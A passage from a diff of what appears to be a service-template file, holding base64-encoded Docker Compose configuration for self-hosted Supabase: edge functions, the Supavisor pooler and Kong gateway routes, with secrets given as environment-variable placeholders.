UZZX0pXVCkge1xuICAgIHRyeSB7XG4gICAgICBjb25zdCB0b2tlbiA9IGdldEF1dGhUb2tlbihyZXEpXG4gICAgICBjb25zdCBpc1ZhbGlkSldUID0gYXdhaXQgdmVyaWZ5SldUKHRva2VuKVxuXG4gICAgICBpZiAoIWlzVmFsaWRKV1QpIHtcbiAgICAgICAgcmV0dXJuIG5ldyBSZXNwb25zZShKU09OLnN0cmluZ2lmeSh7IG1zZzogJ0ludmFsaWQgSldUJyB9KSwge1xuICAgICAgICAgIHN0YXR1czogNDAxLFxuICAgICAgICAgIGhlYWRlcnM6IHsgJ0NvbnRlbnQtVHlwZSc6ICdhcHBsaWNhdGlvbi9qc29uJyB9LFxuICAgICAgICB9KVxuICAgICAgfVxuICAgIH0gY2F0Y2ggKGUpIHtcbiAgICAgIGNvbnNvbGUuZXJyb3IoZSlcbiAgICAgIHJldHVybiBuZXcgUmVzcG9uc2UoSlNPTi5zdHJpbmdpZnkoeyBtc2c6IGUudG9TdHJpbmcoKSB9KSwge1xuICAgICAgICBzdGF0dXM6IDQwMSxcbiAgICAgICAgaGVhZGVyczogeyAnQ29udGVudC1UeXBlJzogJ2FwcGxpY2F0aW9uL2pzb24nIH0sXG4gICAgICB9KVxuICAgIH1cbiAgfVxuXG4gIGNvbnN0IHVybCA9IG5ldyBVUkwocmVxLnVybClcbiAgY29uc3QgeyBwYXRobmFtZSB9ID0gdXJsXG4gIGNvbnN0IHBhdGhfcGFydHMgPSBwYXRobmFtZS5zcGxpdCgnLycpXG4gIGNvbnN0IHNlcnZpY2VfbmFtZSA9IHBhdGhfcGFydHNbMV1cblxuICBpZiAoIXNlcnZpY2VfbmFtZSB8fCBzZXJ2aWNlX25hbWUgPT09ICcnKSB7XG4gICAgY29uc3QgZXJyb3IgPSB7IG1zZzogJ21pc3NpbmcgZnVuY3Rpb24gbmFtZSBpbiByZXF1ZXN0JyB9XG4gICAgcmV0dXJuIG5ldyBSZXNwb25zZShKU09OLnN0cmluZ2lmeShlcnJvciksIHtcbiAgICAgIHN0YXR1czogNDAwLFxuICAgICAgaGVhZGVyczogeyAnQ29udGVudC1UeXBlJzogJ2FwcGxpY2F0aW9uL2pzb24nIH0sXG4gICAgfSlcbiAgfVxuXG4gIGNvbnN0IHNlcnZpY2VQYXRoID0gYC9ob21lL2Rlbm8vZnVuY3Rpb25zLyR7c2VydmljZV9uYW1lfWBcbiAgY29uc29sZS5lcnJvcihgc2VydmluZyB0aGUgcmVxdWVzdCB3aXRoICR7c2VydmljZVBhdGh9YClcblxuICBjb25zdCBtZW1vcnlMaW1pdE1iID0gMTUwXG4gIGNvbnN0IHdvcmtlclRpbWVvdXRNcyA9IDEgKiA2MCAqIDEwMDBcbiAgY29uc3Qgbm9Nb2R1bGVDYWNoZSA9IGZhbHNlXG4gIGNvbnN0IGltcG9ydE1hcFBhdGggPSBudWxsXG4gIGNvbnN0IGVudlZhcnNPYmogPSBEZW5vLmVudi50b09iamVjdCgpXG4gIGNvbnN0IGVudlZhcnMgPSBPYmplY3Qua2V5cyhlbnZWYXJzT2JqKS5tYXAoKGspID0+IFtrLCBlbnZWYXJzT2JqW2tdXSlcblxuICB0cnkge1xuICAgIGNvbnN0IHdvcmtlciA9IGF3YWl0IEVkZ2VSdW50aW1lLnVzZXJXb3JrZXJzLmNyZWF0ZSh7XG4gICAgICBzZXJ2aWNlUGF0aCxcbiAgICAgIG1lbW9yeUxpbWl0TWIsXG4gICAgICB3b3JrZXJUaW1lb3V0TXMsXG4gICAgICBub01vZHVsZUNhY2hlLFxuICAgICAgaW1wb3J0TWFwUGF0aCxcbiAgICAgIGVudlZhcnMsXG4gICAgfSlcbiAgICByZXR1cm4gYXdhaXQgd29ya2VyLmZldGNoKHJlcSlcbiAgfSBjYXRjaCAoZSkge1xuICAgIGNvbnN0IGVycm9yID0geyBtc2c6IGUudG9TdHJpbmcoKSB9XG4gICAgcmV0dXJuIG5ldyBSZXNwb25zZShKU09OLnN0cmluZ2lmeShlcnJvciksIHtcbiAgICAgIHN0YXR1czogNTAwLFxuICAgICAgaGVhZGVyczogeyAnQ29udGVudC1UeXBlJzogJ2FwcGxpY2F0aW9uL2pzb24nIH0sXG4gICAgfSlcbiAgfVxufSkiCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL3ZvbHVtZXMvZnVuY3Rpb25zL2hlbGxvL2luZGV4LnRzCiAgICAgICAgdGFyZ2V0OiAvaG9tZS9kZW5vL2Z1bmN0aW9ucy9oZWxsby9pbmRleC50cwogICAgICAgIGNvbnRlbnQ6ICIvLyBGb2xsb3cgdGhpcyBzZXR1cCBndWlkZSB0byBpbnRlZ3JhdGUgdGhlIERlbm8gbGFuZ3VhZ2Ugc2VydmVyIHdpdGggeW91ciBlZGl0b3I6XG4vLyBodHRwczovL2Rlbm8ubGFuZC9tYW51YWwvZ2V0dGluZ19zdGFydGVkL3NldHVwX3lvdXJfZW52aXJvbm1lbnRcbi8vIFRoaXMgZW5hYmxlcyBhdXRvY29tcGxldGUsIGdvIHRvIGRlZmluaXRpb24sIGV0Yy5cblxuaW1wb3J0IHsgc2VydmUgfSBmcm9tIFwiaHR0cHM6Ly9kZW5vLmxhbmQvc3RkQDAuMTc3LjEvaHR0cC9zZXJ2ZXIudHNcIlxuXG5zZXJ2ZShhc3luYyAoKSA9PiB7XG4gIHJldHVybiBuZXcgUmVzcG9uc2UoXG4gICAgYFwiSGVsbG8gZnJvbSBFZGdlIEZ1bmN0aW9ucyFcImAsXG4gICAgeyBoZWFkZXJzOiB7IFwiQ29udGVudC1UeXBlXCI6IFwiYXBwbGljYXRpb24vanNvblwiIH0gfSxcbiAgKVxufSlcblxuLy8gVG8gaW52b2tlOlxuLy8gY3VybCAnaHR0cDovL2xvY2FsaG9zdDo8S09OR19IVFRQX1BPUlQ+L2Z1bmN0aW9ucy92MS9oZWxsbycgXFxcbi8vICAgLS1oZWFkZXIgJ0F1dGhvcml6YXRpb246IEJlYXJlciA8YW5vbi9zZXJ2aWNlX3JvbGUgQVBJIGtleT4nXG4iCiAgICBjb21tYW5kOgogICAgICAtIHN0YXJ0CiAgICAgIC0gJy0tbWFpbi1zZXJ2aWNlJwogICAgICAtIC9ob21lL2Rlbm8vZnVuY3Rpb25zL21haW4KICBzdXBhYmFzZS1zdXBhdmlzb3I6CiAgICBpbWFnZTogJ3N1cGFiYXNlL3N1cGF2aXNvcjoyLjUuMScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBjdXJsCiAgICAgICAgLSAnLXNTZkwnCiAgICAgICAgLSAnLW8nCiAgICAgICAgLSAvZGV2L251bGwKICAgICAgICAtICdodHRwOi8vMTI3LjAuMC4xOjQwMDAvYXBpL2hlYWx0aCcKICAgICAgdGltZW91dDogNXMKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHJldHJpZXM6IDEwCiAgICBkZXBlbmRzX29uOgogICAgICBzdXBhYmFzZS1kYjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBzdXBhYmFzZS1hbmFseXRpY3M6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGVudmlyb25tZW50OgogICAgICAtIFBPT0xFUl9URU5BTlRfSUQ9ZGV2X3RlbmFudAogICAgICAtIFBPT0xFUl9QT09MX01PREU9dHJhbnNhY3Rpb24KICAgICAgLSAnUE9PTEVSX0RFRkFVTFRfUE9PTF9TSVpFPSR7UE9PTEVSX0RFRkFVTFRfUE9PTF9TSVpFOi0yMH0nCiAgICAgIC0gJ1BPT0xFUl9NQVhfQ0xJRU5UX0NPTk49JHtQT09MRVJfTUFYX0NMSUVOVF9DT05OOi0xMDB9JwogICAgICAtIFBPUlQ9NDAwMAogICAgICAtICdQT1NUR1JFU19QT1JUPSR7UE9TVEdSRVNfUE9SVDotNTQzMn0nCiAgICAgIC0gJ1BPU1RHUkVTX0hPU1ROQU1FPSR7UE9TVEdSRVNfSE9TVE5BTUU6LXN1cGFiYXNlLWRifScKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotcG9zdGdyZXN9JwogICAgICAtICdQT1NUR1JFU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgICAtICdEQVRBQkFTRV9VUkw9ZWN0bzovL3N1cGFiYXNlX2FkbWluOiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AJHtQT1NUR1JFU19IT1NUTkFNRTotc3VwYWJhc2UtZGJ9OiR7UE9TVEdSRVNfUE9SVDotNTQzMn0vX3N1cGFiYXNlJwogICAgICAtIENMVVNURVJfUE9TVEdSRVM9dHJ1ZQogICAgICAtICdTRUNSRVRfS0VZX0JBU0U9JHtTRVJWSUNFX1BBU1NXT1JEX1NVUEFWSVNPUlNFQ1JFVH0nCiAgICAgIC0gJ1ZBVUxUX0VOQ19LRVk9JHtTRVJWSUNFX1BBU1NXT1JEX1ZBVUxURU5DfScKICAgICAgLSAnQVBJX0pXVF9TRUNSRVQ9JHtTRVJWSUNFX1BBU1NXT1JEX0pXVH0nCiAgICAgIC0gJ01FVFJJQ1NfSldUX1NFQ1JFVD0ke1NFUlZJQ0VfUEFTU1dPUkRfSldUfScKICAgICAgLSBSRUdJT049bG9jYWwKICAgICAgLSAnRVJMX0FGTEFHUz0tcHJvdG9fZGlzdCBpbmV0X3RjcCcKICAgIGNvbW1hbmQ6CiAgICAgIC0gL2Jpbi9zaAogICAgICAtICctYycKICAgICAgLSAnL2FwcC9iaW4vbWlncmF0ZSAmJiAvYXBwL2Jpbi9zdXBhdmlzb3IgZXZhbCAiJCQoY2F0IC9ldGMvcG9vbGVyL3Bvb2xlci5leHMpIiAmJiAvYXBwL2Jpbi9zZXJ2ZXInCiAgICB2b2x1bWVzOgogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi92b2x1bWVzL3Bvb2xlci9wb29sZXIuZXhzCiAgICAgICAgdGFyZ2V0OiAvZXRjL3Bvb2xlci9wb29sZXIuZXhzCiAgICAgICAgY29udGVudDogIns6b2ssIF99ID0gQXBwbGljYXRpb24uZW5zdXJlX2FsbF9zdGFydGVkKDpzdXBhdmlzb3IpXG57Om9rLCB2ZXJzaW9ufSA9XG4gICAgY2FzZSBTdXBhdmlzb3IuUmVwby5xdWVyeSEoXCJzZWxlY3QgdmVyc2lvbigpXCIpIGRvXG4gICAgJXtyb3dzOiBbW3Zlcl1dfSAtPiBTdXBhdmlzb3IuSGVscGVycy5wYXJzZV9wZ192ZXJzaW9uKHZlcilcbiAgICBfIC0+IG5pbFxuICAgIGVuZFxucGFyYW1zID0gJXtcbiAgICBcImV4dGVybmFsX2lkXCIgPT4gU3lzdGVtLmdldF9lbnYoXCJQT09MRVJfVEVOQU5UX0lEXCIpLFxuICAgIFwiZGJfaG9zdFwiID0+IFN5c3RlbS5nZXRfZW52KFwiUE9TVEdSRVNfSE9TVE5BTUVcIiksXG4gICAgXCJkYl9wb3J0XCIgPT4gU3lzdGVtLmdldF9lbnYoXCJQT1NUR1JFU19QT1JUXCIpIHw+IFN0cmluZy50b19pbnRlZ2VyKCksXG4gICAgXCJkYl9kYXRhYmFzZVwiID0+IFN5c3RlbS5nZXRfZW52KFwiUE9TVEdSRVNfREJcIiksXG4gICAgXCJyZXF1aXJlX3VzZXJcIiA9PiBmYWxzZSxcbiAgICBcImF1dGhfcXVlcnlcIiA9PiBcIlNFTEVDVCAqIEZST00gcGdib3VuY2VyLmdldF9hdXRoKCQxKVwiLFxuICAgIFwiZGVmYXVsdF9tYXhfY2xpZW50c1wiID0+IFN5c3RlbS5nZXRfZW52KFwiUE9PTEVSX01BWF9DTElFTlRfQ09OTlwiKSxcbiAgICBcImRlZmF1bHRfcG9vbF9zaXplXCIgPT4gU3lzdGVtLmdldF9lbnYoXCJQT09MRVJfREVGQVVMVF9QT09MX1NJWkVcIiksXG4gICAgXCJkZWZhdWx0X3BhcmFtZXRlcl9zdGF0dXNcIiA9PiAle1wic2VydmVyX3ZlcnNpb25cIiA9PiB2ZXJzaW9ufSxcbiAgICBcInVzZXJzXCIgPT4gWyV7XG4gICAgXCJkYl91c2VyXCIgPT4gXCJwZ2JvdW5jZXJcIixcbiAgICBcImRiX3Bhc3N3b3JkXCIgPT4gU3lzdGVtLmdldF9lbnYoXCJQT1NUR1JFU19QQVNTV09SRFwiKSxcbiAgICBcIm1vZGVfdHlwZVwiID0+IFN5c3RlbS5nZXRfZW52KFwiUE9PTEVSX1BPT0xfTU9ERVwiKSxcbiAgICBcInBvb2xfc2l6ZVwiID0+IFN5c3RlbS5nZXRfZW52KFwiUE9PTEVSX0RFRkFVTFRfUE9PTF9TSVpFXCIpLFxuICAgIFwiaXNfbWFuYWdlclwiID0+IHRydWVcbiAgICB9XVxufVxuXG50ZW5hbnQgPSBTdXBhdmlzb3IuVGVuYW50cy5nZXRfdGVuYW50X2J5X2V4dGVybmFsX2lkKHBhcmFtc1tcImV4dGVybmFsX2lkXCJdKVxuXG5pZiB0ZW5hbnQgZG9cbiAgezpvaywgX30gPSBTdXBhdmlzb3IuVGVuYW50cy51cGRhdGVfdGVuYW50KHRlbmFudCwgcGFyYW1zKVxuZWxzZVxuICB7Om9rLCBffSA9IFN1cGF2aXNvci5UZW5hbnRzLmNyZWF0ZV90ZW5hbnQocGFyYW1zKVxuZW5kXG4iCg==",
+        "compose": "c2VydmljZXM6CiAgc3VwYWJhc2Uta29uZzoKICAgIGltYWdlOiAna29uZzoyLjguMScKICAgIGVudHJ5cG9pbnQ6ICdiYXNoIC1jICcnZXZhbCAiZWNobyBcIiQkKGNhdCB+L3RlbXAueW1sKVwiIiA+IH4va29uZy55bWwgJiYgL2RvY2tlci1lbnRyeXBvaW50LnNoIGtvbmcgZG9ja2VyLXN0YXJ0JycnCiAgICBkZXBlbmRzX29uOgogICAgICBzdXBhYmFzZS1hbmFseXRpY3M6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfVVJMX1NVUEFCQVNFS09OR184MDAwCiAgICAgIC0gJ0tPTkdfUE9SVF9NQVBTPTQ0Mzo4MDAwJwogICAgICAtICdKV1RfU0VDUkVUPSR7U0VSVklDRV9QQVNTV09SRF9KV1R9JwogICAgICAtIEtPTkdfREFUQUJBU0U9b2ZmCiAgICAgIC0gS09OR19ERUNMQVJBVElWRV9DT05GSUc9L2hvbWUva29uZy9rb25nLnltbAogICAgICAtICdLT05HX0ROU19PUkRFUj1MQVNULEEsQ05BTUUnCiAgICAgIC0gJ0tPTkdfUExVR0lOUz1yZXF1ZXN0LXRyYW5zZm9ybWVyLGNvcnMsa2V5LWF1dGgsYWNsLGJhc2ljLWF1dGgnCiAgICAgIC0gS09OR19OR0lOWF9QUk9YWV9QUk9YWV9CVUZGRVJfU0laRT0xNjBrCiAgICAgIC0gJ0tPTkdfTkdJTlhfUFJPWFlfUFJPWFlfQlVGRkVSUz02NCAxNjBrJwogICAgICAtICdTVVBBQkFTRV9BTk9OX0tFWT0ke1NFUlZJQ0VfU1VQQUJBU0VBTk9OX0tFWX0nCiAgICAgIC0gJ1NVUEFCQVNFX1NFUlZJQ0VfS0VZPSR7U0VSVklDRV9TVVBBQkFTRVNFUlZJQ0VfS0VZfScKICAgICAgLSAnREFTSEJPQVJEX1VTRVJOQU1FPSR7U0VSVklDRV9VU0VSX0FETUlOfScKICAgICAgLSAnREFTSEJPQVJEX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9BRE1JTn0nCiAgICB2b2x1bWVzOgogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi92b2x1bWVzL2FwaS9rb25nLnltbAogICAgICAgIHRhcmdldDogL2hvbWUva29uZy90ZW1wLnltbAogICAgICAgIGNvbnRlbnQ6ICJfZm9ybWF0X3ZlcnNpb246ICcyLjEnXG5fdHJhbnNmb3JtOiB0cnVlXG5cbiMjI1xuIyMjIENvbnN1bWVycyAvIFVzZXJzXG4jIyNcbmNvbnN1bWVyczpcbiAgLSB1c2VybmFtZTogREFTSEJPQVJEXG4gIC0gdXNlcm5hbWU6IGFub25cbiAgICBrZXlhdXRoX2NyZWRlbnRpYWxzOlxuICAgICAgLSBrZXk6ICRTVVBBQkFTRV9BTk9OX0tFWVxuICAtIHVzZXJuYW1lOiBzZXJ2aWNlX3JvbGVcbiAgICBrZXlhdXRoX2NyZWRlbnRpYWxzOlxuICAgICAgLSBrZXk6ICRTVVBBQkFTRV9TRVJWSUNFX0tFWVxuXG4jIyNcbiMjIyBBY2Nlc3MgQ29udHJvbCBMaXN0XG4jIyNcbmFjbHM6XG4gIC0gY29uc3VtZXI6IGFub25cbiAgICBncm91cDogYW5vblxuICAtIGNvbnN1bWVyOiBzZXJ2aWNlX3JvbGVcbiAgICBncm91cDogYWRtaW5cblxuIyMjXG4jIyMgRGFzaGJvYXJkIGNyZWRlbnRpYWxzXG4jIyNcbmJhc2ljYXV0aF9jcmVkZW50aWFsczpcbi0gY29uc3VtZXI6IERBU0hCT0FSRFxuICB1c2VybmFtZTogJERBU0hCT0FSRF9VU0VSTkFNRVxuICBwYXNzd29yZDogJERBU0hCT0FSRF9QQVNTV09SRFxuXG5cbiMjI1xuIyMjIEFQSSBSb3V0ZXNcbiMjI1xuc2VydmljZXM6XG5cbiAgIyMgT3BlbiBBdXRoIHJvdXRlc1xuICAtIG5hbWU6IGF1dGgtdjEtb3BlblxuICAgIHVybDogaHR0cDovL3N1cGFiYXNlLWF1dGg6OTk5OS92ZXJpZnlcbiAgICByb3V0ZXM6XG4gICAgICAtIG5hbWU6IGF1dGgtdjEtb3BlblxuICAgICAgICBzdHJpcF9wYXRoOiB0cnVlXG4gICAgICAgIHBhdGhzOlxuICAgICAgICAgIC0gL2F1dGgvdjEvdmVyaWZ5XG4gICAgcGx1Z2luczpcbiAgICAgIC0gbmFtZTogY29yc1xuICAtIG5hbWU6IGF1dGgtdjEtb3Blbi1jYWxsYmFja1xuICAgIHVybDogaHR0cDovL3N1cGFiYXNlLWF1dGg6OTk5OS9jYWxsYmFja1xuICAgIHJvdXRlczpcbiAgICAgIC0gbmFtZTogYXV0aC12MS1vcGVuLWNhbGxiYWNrXG4gICAgICAgIHN0cmlwX3BhdGg6IHRydWVcbiAgICAgICAgcGF0aHM6XG4gICAgICAgICAgLSAvYXV0aC92MS9jYWxsYmFja1xuICAgIHBsdWdpbnM6XG4gICAgICAtIG5hbWU6IGNvcnNcbiAgLSBuYW1lOiBhdXRoLXYxLW9wZW4tYXV0aG9yaXplXG4gICAgdXJsOiBodHRwOi8vc3VwYWJhc2UtYXV0aDo5OTk5L2F1dGhvcml6ZVxuICAgIHJvdXRlczpcbiAgICAgIC0gbmFtZTogYXV0aC12MS1vcGVuLWF1dGhvcml6ZVxuICAgICAgICBzdHJpcF9wYXRoOiB0cnVlXG4gICAgICAgIHBhdGhzOlxuICAgICAgICAgIC0gL2F1dGgvdjEvYXV0aG9yaXplXG4gICAgcGx1Z2luczpcbiAgICAgIC0gbmFtZTogY29yc1xuXG4gICMjIFNlY3VyZSBBdXRoIHJvdXRlc1xuICAtIG5hbWU6IGF1dGgtdjFcbiAgICBfY29tbWVudDogJ0dvVHJ1ZTogL2F1dGgvdjEvKiAtPiBodHRwOi8vc3VwYWJhc2UtYXV0aDo5OTk5LyonXG4gICAgdXJsOiBodHRwOi8vc3VwYWJhc2UtYXV0aDo5OTk5L1xuICAgIHJvdXRlczpcbiAgICAgIC0gbmFtZTogYXV0aC12MS1hbGxcbiAgICAgICAgc3RyaXBfcGF0aDogdHJ1ZVxuICAgICAgICBwYXRoczpcbiAgICAgICAgICAtIC9hdXRoL3YxL1xuICAgIHBsdWdpbnM6XG4gICAgICAtIG5hbWU6IGNvcnNcbiAgICAgIC0gbmFtZToga2V5LWF1dGhcbiAgICAgICAgY29uZmlnOlxuICAgICAgICAgIGhpZGVfY3JlZGVudGlhbHM6IGZhbHNlXG4gICAgICAtIG5hbWU6IGFjbFxuICAgICAgICBjb25maWc6XG4gICAgICAgICAgaGlkZV9ncm91cHNfaGVhZGVyOiB0cnVlXG4gICAgICAgICAgYWxsb3c6XG4gICAgICAgICAgICAtIGFkbWluXG4gICAgICAgICAgICAtIGFub25cblxuICAjIyBTZWN1cmUgUkVTVCByb3V0ZXNcbiAgLSBuYW1lOiByZXN0LXYxXG4gICAgX2NvbW1lbnQ6ICdQb3N0Z1JFU1Q6IC9yZXN0L3YxLyogLT4gaHR0cDovL3N1cGFiYXNlLXJlc3Q6MzAwMC8qJ1xuICAgIHVybDogaHR0cDovL3N1cGFiYXNlLXJlc3Q6MzAwMC9cbiAgICByb3V0ZXM6XG4gICAgICAtIG5hbWU6IHJlc3QtdjEtYWxsXG4gICAgICAgIHN0cmlwX3BhdGg6IHRydWVcbiAgICAgICAgcGF0aHM6XG4gICAgICAgICAgLSAvcmVzdC92MS9cbiAgICBwbHVnaW5zOlxuICAgICAgLSBuYW1lOiBjb3JzXG4gICAgICAtIG5hbWU6IGtleS1hdXRoXG4gICAgICAgIGNvbmZpZzpcbiAgICAgICAgICBoaWRlX2NyZWRlbnRpYWxzOiB0cnVlXG4gICAgICAtIG5hbWU6IGFjbFxuICAgICAgICBjb25maWc6XG4gICAgICAgICAgaGlkZV9ncm91cHNfaGVhZGVyOiB0cnVlXG4gICAgICAgICAgYWxsb3c6XG4gICAgICAgICAgICAtIGFkbWluXG4gICAgICAgICAgICAtIGFub25cblxuICAjIyBTZWN1cmUgR3JhcGhRTCByb3V0ZXNcbiAgLSBuYW1lOiBncmFwaHFsLXYxXG4gICAgX2NvbW1lbnQ6ICdQb3N0Z1JFU1Q6IC9ncmFwaHFsL3YxLyogLT4gaHR0cDovL3N1cGFiYXNlLXJlc3Q6MzAwMC9ycGMvZ3JhcGhxbCdcbiAgICB1cmw6IGh0dHA6Ly9zdXBhYmFzZS1yZXN0OjMwMDAvcnBjL2dyYXBocWxcbiAgICByb3V0ZXM6XG4gICAgICAtIG5hbWU6IGdyYXBocWwtdjEtYWxsXG4gICAgICAgIHN0cmlwX3BhdGg6IHRydWVcbiAgICAgICAgcGF0aHM6XG4gICAgICAgICAgLSAvZ3JhcGhxbC92MVxuICAgIHBsdWdpbnM6XG4gICAgICAtIG5hbWU6IGNvcnNcbiAgICAgIC0gbmFtZToga2V5LWF1dGhcbiAgICAgICAgY29uZmlnOlxuICAgICAgICAgIGhpZGVfY3JlZGVudGlhbHM6IHRydWVcbiAgICAgIC0gbmFtZTogcmVxdWVzdC10cmFuc2Zvcm1lclxuICAgICAgICBjb25maWc6XG4gICAgICAgICAgYWRkOlxuICAgICAgICAgICAgaGVhZGVyczpcbiAgICAgICAgICAgICAgLSBDb250ZW50LVByb2ZpbGU6Z3JhcGhxbF9wdWJsaWNcbiAgICAgIC0gbmFtZTogYWNsXG4gICAgICAgIGNvbmZpZzpcbiAgICAgICAgICBoaWRlX2dyb3Vwc19oZWFkZXI6IHRydWVcbiAgICAgICAgICBhbGxvdzpcbiAgICAgICAgICAgIC0gYWRtaW5cbiAgICAgICAgICAgIC0gYW5vblxuXG4gICMjIFNlY3VyZSBSZWFsdGltZSByb3V0ZXNcbiAgLSBuYW1lOiByZWFsdGltZS12MS13c1xuICAgIF9jb21tZW50OiAnUmVhbHRpbWU6IC9yZWFsdGltZS92MS8qIC0+IHdzOi8vcmVhbHRpbWU6NDAwMC9zb2NrZXQvKidcbiAgICB1cmw6IGh0dHA6Ly9yZWFsdGltZS1kZXY6NDAwMC9zb2NrZXRcbiAgICBwcm90b2NvbDogd3NcbiAgICByb3V0ZXM6XG4gICAgICAtIG5hbWU6IHJlYWx0aW1lLXYxLXdzXG4gICAgICAgIHN0cmlwX3BhdGg6IHRydWVcbiAgICAgICAgcGF0aHM6XG4gICAgICAgICAgLSAvcmVhbHRpbWUvdjEvXG4gICAgcGx1Z2luczpcbiAgICAgIC0gbmFtZTogY29yc1xuICAgICAgLSBuYW1lOiBrZXktYXV0aFxuICAgICAgICBjb25maWc6XG4gICAgICAgICAgaGlkZV9jcmVkZW50aWFsczogZmFsc2VcbiAgICAgIC0gbmFtZTogYWNsXG4gICAgICAgIGNvbmZpZzpcbiAgICAgICAgICBoaWRlX2dyb3Vwc19oZWFkZXI6IHRydWVcbiAgICAgICAgICBhbGxvdzpcbiAgICAgICAgICAgIC0gYWRtaW5cbiAgICAgICAgICAgIC0gYW5vblxuICAtIG5hbWU6IHJlYWx0aW1lLXYxLXJlc3RcbiAgICBfY29tbWVudDogJ1JlYWx0aW1lOiAvcmVhbHRpbWUvdjEvKiAtPiB3czovL3JlYWx0aW1lOjQwMDAvc29ja2V0LyonXG4gICAgdXJsOiBodHRwOi8vcmVhbHRpbWUtZGV2OjQwMDAvYXBpXG4gICAgcHJvdG9jb2w6IGh0dHBcbiAgICByb3V0ZXM6XG4gICAgICAtIG5hbWU6IHJlYWx0aW1lLXYxLXJlc3RcbiAgICAgICAgc3RyaXBfcGF0aDogdHJ1ZVxuICAgICAgICBwYXRoczpcbiAgICAgICAgICAtIC9yZWFsdGltZS92MS9hcGlcbiAgICBwbHVnaW5zOlxuICAgICAgLSBuYW1lOiBjb3JzXG4gICAgICAtIG5hbWU6IGtleS1hdXRoXG4gICAgICAgIGNvbmZpZzpcbiAgICAgICAgICBoaWRlX2NyZWRlbnRpYWxzOiBmYWxzZVxuICAgICAgLSBuYW1lOiBhY2xcbiAgICAgICAgY29uZmlnOlxuICAgICAgICAgIGhpZGVfZ3JvdXBzX2hlYWRlcjogdHJ1ZVxuICAgICAgICAgIGFsbG93OlxuICAgICAgICAgICAgLSBhZG1pblxuICAgICAgICAgICAgLSBhbm9uXG5cbiAgIyMgU3RvcmFnZSByb3V0ZXM6IHRoZSBzdG9yYWdlIHNlcnZlciBtYW5hZ2VzIGl0cyBvd24gYXV0aFxuICAtIG5hbWU6IHN0b3JhZ2UtdjFcbiAgICBfY29tbWVudDogJ1N0b3JhZ2U6IC9zdG9yYWdlL3YxLyogLT4gaHR0cDovL3N1cGFiYXNlLXN0b3JhZ2U6NTAwMC8qJ1xuICAgIHVybDogaHR0cDovL3N1cGFiYXNlLXN0b3JhZ2U6NTAwMC9cbiAgICByb3V0ZXM6XG4gICAgICAtIG5hbWU6IHN0b3JhZ2UtdjEtYWxsXG4gICAgICAgIHN0cmlwX3BhdGg6IHRydWVcbiAgICAgICAgcGF0aHM6XG4gICAgICAgICAgLSAvc3RvcmFnZS92MS9cbiAgICBwbHVnaW5zOlxuICAgICAgLSBuYW1lOiBjb3JzXG5cbiAgIyMgRWRnZSBGdW5jdGlvbnMgcm91dGVzXG4gIC0gbmFtZTogZnVuY3Rpb25zLXYxXG4gICAgX2NvbW1lbnQ6ICdFZGdlIEZ1bmN0aW9uczogL2Z1bmN0aW9ucy92MS8qIC0+IGh0dHA6Ly9zdXBhYmFzZS1lZGdlLWZ1bmN0aW9uczo5MDAwLyonXG4gICAgdXJsOiBodHRwOi8vc3VwYWJhc2UtZWRnZS1mdW5jdGlvbnM6OTAwMC9cbiAgICByb3V0ZXM6XG4gICAgICAtIG5hbWU6IGZ1bmN0aW9ucy12MS1hbGxcbiAgICAgICAgc3RyaXBfcGF0aDogdHJ1ZVxuICAgICAgICBwYXRoczpcbiAgICAgICAgICAtIC9mdW5jdGlvbnMvdjEvXG4gICAgcGx1Z2luczpcbiAgICAgIC0gbmFtZTogY29yc1xuXG4gICMjIEFuYWx5dGljcyByb3V0ZXNcbiAgLSBuYW1lOiBhbmFseXRpY3MtdjFcbiAgICBfY29tbWVudDogJ0FuYWx5dGljczogL2FuYWx5dGljcy92MS8qIC0+IGh0dHA6Ly9sb2dmbGFyZTo0MDAwLyonXG4gICAgdXJsOiBodHRwOi8vc3VwYWJhc2UtYW5hbHl0aWNzOjQwMDAvXG4gICAgcm91dGVzOlxuICAgICAgLSBuYW1lOiBhbmFseXRpY3MtdjEtYWxsXG4gICAgICAgIHN0cmlwX3BhdGg6IHRydWVcbiAgICAgICAgcGF0aHM6XG4gICAgICAgICAgLSAvYW5hbHl0aWNzL3YxL1xuXG4gICMjIFNlY3VyZSBEYXRhYmFzZSByb3V0ZXNcbiAgLSBuYW1lOiBtZXRhXG4gICAgX2NvbW1lbnQ6ICdwZy1tZXRhOiAvcGcvKiAtPiBodHRwOi8vc3VwYWJhc2UtbWV0YTo4MDgwLyonXG4gICAgdXJsOiBodHRwOi8vc3VwYWJhc2UtbWV0YTo4MDgwL1xuICAgIHJvdXRlczpcbiAgICAgIC0gbmFtZTogbWV0YS1hbGxcbiAgICAgICAgc3RyaXBfcGF0aDogdHJ1ZVxuICAgICAgICBwYXRoczpcbiAgICAgICAgICAtIC9wZy9cbiAgICBwbHVnaW5zOlxuICAgICAgLSBuYW1lOiBrZXktYXV0aFxuICAgICAgICBjb25maWc6XG4gICAgICAgICAgaGlkZV9jcmVkZW50aWFsczogZmFsc2VcbiAgICAgIC0gbmFtZTogYWNsXG4gICAgICAgIGNvbmZpZzpcbiAgICAgICAgICBoaWRlX2dyb3Vwc19oZWFkZXI6IHRydWVcbiAgICAgICAgICBhbGxvdzpcbiAgICAgICAgICAgIC0gYWRtaW5cblxuICAjIyBQcm90ZWN0ZWQgRGFzaGJvYXJkIC0gY2F0Y2ggYWxsIHJlbWFpbmluZyByb3V0ZXNcbiAgLSBuYW1lOiBkYXNoYm9hcmRcbiAgICBfY29tbWVudDogJ1N0dWRpbzogLyog